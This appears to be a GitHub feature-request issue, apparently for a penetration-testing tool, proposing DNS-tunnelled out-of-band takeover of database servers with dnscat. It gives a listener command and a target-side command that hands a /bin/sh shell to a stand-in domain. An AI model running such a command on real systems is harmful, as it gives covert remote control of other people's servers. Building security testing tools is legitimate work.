-
-
Notifications
You must be signed in to change notification settings - Fork 6.2k
Open
Description
We have already got OOB database server takeover via TCP (using Metasploit payloads: shell, Meterpreter, VNC), via ICMP (using icmpsh). It is time to implement out-of-band via DNS.
DNS tunneling as a Metasploit shellcode: http://www.skullsecurity.org/blog/?p=611.
Details about dnscat: http://www.skullsecurity.org/wiki/index.php/Dnscat.
Example of string on the authoritative DNS server for tun.yourdomain.org:
sudo ./dnscat --listen
Example of string of the client (target system):
./dnscat --domain tun.yourdomain.org --exec "/bin/sh"
Type commands on the authoritative DNS server for tun.yourdomain.org where you launched dnscat, they will be executed on the client (target system) and standard output shown inline.
Reactions are currently unavailable